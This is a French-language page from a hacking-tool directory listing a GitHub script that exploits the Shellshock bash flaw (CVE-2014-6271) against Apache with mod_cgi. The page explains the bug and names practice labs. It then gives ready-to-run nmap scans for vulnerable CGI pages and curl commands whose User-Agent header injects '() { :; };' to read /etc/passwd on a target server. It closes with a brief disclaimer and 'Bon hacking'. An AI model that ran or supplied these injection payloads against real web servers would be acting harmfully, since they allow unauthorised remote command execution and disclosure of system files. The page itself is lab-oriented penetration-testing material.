Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2014-6271 — Exploitation de la vulnérabilité « Shellshock ». Exécution de code à distance dans Apache avec mod_cgi | Kitploit
Outils/GitHubGitHub/j0hnth3kn1ght/cve-2014-6271
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubj0hnth3kn1ght/cve-2014-6271

CVE-2014-6271

Exploitation de la vulnérabilité « Shellshock ». Exécution de code à distance dans Apache avec mod_cgi

Voir le dépôt
5il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploitation de Shellshock (CVE-2014-6271)

Shellshock est une vulnérabilité d'exécution de commande à distance dans BASH. Ce script exploite la vulnérabilité dans l'environnement web sur Apache ou similaire avec mod_cgi activé. La vulnérabilité réside dans la manipulation des variables d'environnement, qui sont des valeurs nommées dynamiques affectant le comportement des processus sur un ordinateur. Les attaquants peuvent l'exploiter en attachant du code malveillant aux variables d'environnement, qui est exécuté lors de la réception de la variable. Cela permet aux attaquants de compromettre potentiellement le système.

Laboratoire pour tester la vulnérabilité

  • PentesterLab

  • VulnHub

  • TryHackMe

    Vídeo2

Trouver les pages CGI-BIN :

root@kitploit:~
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x

Test manuel :

root@kitploit:~
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>

Avertissement :

Je ne suis pas responsable de toute utilisation illégale ou des dommages causés par cet outil. Il a été écrit pour le fun, pas pour le mal, et vise à sensibiliser au hacking et à la cybersécurité.

Bon hacking :)

Télécharger l’outil